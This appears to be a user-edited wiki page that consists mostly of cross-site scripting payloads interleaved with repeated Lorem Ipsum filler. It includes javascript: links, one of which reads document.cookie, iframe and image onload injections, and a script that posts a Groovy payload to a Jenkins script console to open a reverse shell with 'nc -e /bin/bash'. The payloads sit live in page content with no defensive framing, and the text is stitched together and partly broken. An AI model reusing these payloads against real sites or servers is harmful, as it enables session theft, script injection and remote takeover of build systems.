Read
Edit
History
Notify
Share
cgej
https://www.coin.ts
<foo-bar baz="foobar" forbidden="true"></foo-bar><div is="foo-baz"></div>
[XSS](j a v a s c r i p t:prompt(document.cookie))
[XSS]: (javascript:prompt(document.cookie))
[XSS](javascript:this;alert(1))
[XSS](javascript:this;alert(1))
[XSS](Javascript:alert(1))
[XSS](Javas%26%2399;ript:alert(1))
[XSS](javascript:alert(1))
[XSS](javascript:confirm(1)
[XSS](�javascript:alert(document.domain))
<a href="Javascript:alert(1)">here</a>
Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.
<iframe width="560" height="315" src="javascript:prompt(1)" title="YouTube video player" frameborder="0" ></iframe>
<iframe width="560" height="315" src="<a href="">Click me</a>" title="YouTube video player" frameborder="0" ></iframe></a><a href="javascript:prompt(1)">Click me</a>
<iframe width="560" height="315" src="https://www.youtube.com/embed/WXUgf7DCHvg" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe>
<script> var myIframe = document.getElementById("my-iframe"); myIframe.onload = function() { // Access the iframe's content window var iframeWindow = myIframe.contentWindow; // Add an onclick event to an element in the iframe var iframeButton = iframeWindow.document.getElementById("my-button"); iframeButton.onclick = function() { // Custom JavaScript code to run when the button is clicked alert("Button clicked inside iframe!"); }; }; </script>
The standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.
Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.
![Click Me](javascript:alert('Uh oh...')){: .btn}
<ouc:editor csspath="/_resources/ou/editor/wysiwyg.css" cssmenu="/_resources/ou/editor/styles.txt" />
Click me
![Escape SRC - onload](https://iq.wiki/wiki/image.png%22onload=%22alert('ImageOnLod'))
The standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.
Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.
The standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.
1
`
// update me
var command = 'nc -e /bin/bash 127.0.0.1 11235'
var jenkinsHost = '127.0.0.1';
var jenkinsPort = 8080;
// construct target and payload
var jenkinsUrl = '
var jenkinsPayload = `script=def command = '${command}';def proc = command.execute();proc.waitFor();`;
// construct and send the request
var xmlHttp = new XMLHttpRequest();
xmlHttp.open('POST', jenkinsUrl, true);
xmlHttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded')
xmlHttp.send(jenkinsPayload);
</script>`nC
cgej
Commit Info
Edited By
Edited On
June 23, 2023
Feedback
Average Rating
How was your experience?
Give this wiki a quick rating to let us know!
Media
REFERENCES
[1]